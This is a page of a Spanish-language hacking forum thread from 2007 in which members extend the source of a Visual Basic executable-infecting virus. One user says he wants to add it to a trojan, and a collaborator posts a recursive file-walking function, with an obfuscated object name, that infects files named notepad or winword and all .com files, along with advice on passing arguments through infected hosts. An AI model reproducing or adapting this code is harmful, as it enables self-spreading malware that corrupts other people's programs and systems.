elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] Infección de ejecutables en VB6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] Ir Abajo Respuesta Imprimir
Autor Tema: [Source] Infección de ejecutables en VB6  (Leído 22,630 veces)
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #40 en: 11 Julio 2007, 20:43 pm »

Hola, este codigo está muy bien, pero digo en varias cosas que podría mejorar y que estarían muy bien:

-Que los parametros se pasen también al archivo infectado, pues si ejecutas por ejemplo ping 127.0.0.1 -n1 y el archivo ping.exe está infectado se ejecutaría simplemente ping

-Que sea el virus el que se descomprime en la ruta temporal y no el programa original, pues en caso de que por ejemplo un programa buscase los archivos que necesita para funcionar en su mismo directorio al estar en temp no los encontraría.

Después me gustaría saber como se podría hacer esto:

-Que no infecte a una carpeta (subcarpetas y archivos  :xD) determinada o que solo infecte a una determinada
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Es que me gustaría añadir esto a un troyano y weno, me gustaría saber como podría hacer esto.

Saludos ;)


En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #41 en: 11 Julio 2007, 20:49 pm »

-Que busque el nombre de un programa en concreto y solo infecte a ese.

Aqui tienes para lo del nombre:

Código
  1. Function Subfolders(path)
  2.    On Error Resume Next
  3.    'Se cifra el string que carga el objeto Scripting.FileSystemObject
  4.    Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
  5.    Set Drives = fso.Drives
  6.  
  7.    newpath = path
  8.    Set Fold = fso.GetFolder(newpath)
  9.    Set Files = Fold.Files
  10.  
  11.    For Each File In Files
  12.        ext = fso.GetExtensionName(File.path)
  13.        ext = LCase(ext)
  14.        nam = LCase(File.Name)
  15.        'Modificación del Source
  16.        If (nam = "notepad") OR (nam = "winword") OR (ext = "com") Then
  17.            If IsInfected(File.path) = False Then
  18.                InfectFile (File.path)
  19.                DoEvents
  20.            End If
  21.        End If
  22.    Next
  23.  
  24.    Set File = Fold.Subfolders
  25.    For Each Subfol In File
  26.        Call Subfolders(Subfol.path)
  27.    Next
  28. End Function
Este ejemplo infecta cualquier archivo llamado notepad.* y winword.* Además infectará todos los archivo con extensión *.com

Citar
-Que no infecte a una carpeta (subcarpetas y archivos  :xD) determinada o que solo infecte a una determinada
Este es más complicado, pero creo que debería suprimir la parte del final:

Código
  1.    Set File = Fold.Subfolders
  2.    For Each Subfol In File
  3.        Call Subfolders(Subfol.path)
  4.    Next

Y llamar a la función: Subfolders con la ruta exacta, ejemplo: Subfolders("C:\Windows\System32)"
Ojo que esto último no lo he probado


En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #42 en: 11 Julio 2007, 21:34 pm »

Gracias, cuando pueda ya pruevo. Y encontraste alguna manera de como pasar los parametros al programa original. Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Sludos y gracias por todo ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #43 en: 11 Julio 2007, 22:32 pm »

Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Existe una variable de VB6 llamada:

Código
  1. Parametros = Command$

Esto te devuelve los parametros con el que se ha ejecutado tu aplicación, con eso tienes suficiente. Saludos!!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #44 en: 11 Julio 2007, 22:35 pm »

||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #45 en: 11 Julio 2007, 22:40 pm »

||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Instalado Mod para Programación/Programadores GeSHi
https://foro.elhacker.net/index.php/topic,170103.0.html
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #46 en: 11 Julio 2007, 22:40 pm »

Ok Muchas gracias.!!
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: [Source] Infección de ejecutables en VB6
« Respuesta #47 en: 11 Julio 2007, 22:44 pm »

Disculpen el 2ble post.:
y Tambien disculpen desviar el hilo...

¿Como se usa?

Código
  1. asii??

no no se...
En línea

Páginas: 1 2 3 4 [5] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines